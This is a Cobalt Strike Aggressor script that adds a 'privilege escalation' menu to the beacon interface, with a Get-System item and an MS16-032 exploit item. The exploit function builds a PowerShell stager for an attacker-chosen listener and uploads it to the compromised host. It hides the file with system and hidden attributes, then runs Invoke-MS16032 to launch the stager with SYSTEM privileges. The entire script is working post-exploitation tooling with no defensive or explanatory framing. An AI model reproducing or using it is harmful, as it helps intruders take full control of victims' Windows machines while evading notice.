sub ms16-032{
    local('$Rch $payload $fname');
    @array = @("a", "b", "c", "d", "e", "f", "g", "1", "2", "3", "4", "5", "6");
    $total = 8;
    $bid = $3['bid'];
    while($total >= 0){
        $fname = $fname.rand(@array);
        $total = $total - 1;
    }
    $fname = $fname.".cmd";
    $Rch = "x86";
    if (beacon_info($bid,"is64") == 1){
        $Rch = "x64";
    }
    $payload = powershell($3['listener'], false, $Rch);
    $handle = openf("> $+ $fname");
    writeb($handle, $payload);
    closef($handle);
    bupload($bid, $fname);
    bshell($bid, "attrib \" $+ $fname\" +s +h");
    bpowershell_import($bid, script_resource("./modules/Invoke-MS16032.ps1"));
    bpowershell($bid, "Invoke-MS16-032  $+ $fname");
    exec("cmd.exe /C del /F ".$fname);
}

menu "权限提升" {

	item "Get-System" {
		binput($1,"getsystem");
		bgetsystem($1);
	}
    separator();
	item "ms16-032" {
		$dialog = dialog("ms16-032",%(bid => $1['@']),&ms16-032);
		dialog_description($dialog,"Test");
		drow_listener($dialog,"listener","Listener: ");
		dbutton_action($dialog,"Exploits");
		dialog_show($dialog);
}


}